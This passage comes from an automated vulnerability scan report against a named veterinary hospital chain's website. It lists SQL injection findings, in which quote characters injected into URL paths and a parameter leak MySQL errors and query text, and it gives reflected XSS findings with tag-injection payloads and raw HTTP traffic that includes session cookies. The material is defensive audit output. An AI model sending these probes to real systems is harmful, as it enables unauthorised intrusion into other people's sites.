Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='marshfield''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''                        
                        limit 1' at line 31

Request 2

GET /marshfield''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new-york-veterinary-hospital'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2286
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
n ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='new-york-veterinary-hospital''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''new-york-veterinary-hospital''                        
                        limit 1' at line 31

Request 2

GET /new-york-veterinary-hospital''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/more/boarding.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth''/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Length: 7909
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema=E13' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''E13'' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

Request 2

GET /tools/markers_sema.php?sema=E13'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

2. Cross-site scripting (reflected)  previous  next
There are 138 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /becker/markers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfec"><a>30055149e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becker/markers.php6dfec"><a>30055149e9d?lat=40.7388648&lng=-73.9831733&ffe HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator.
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:48:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="markers6dfec"><a>30055149e9d">
...[SNIP]...

2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54666"><a>31d8f105f44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hanson/appt.html54666"><a>31d8f105f44 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
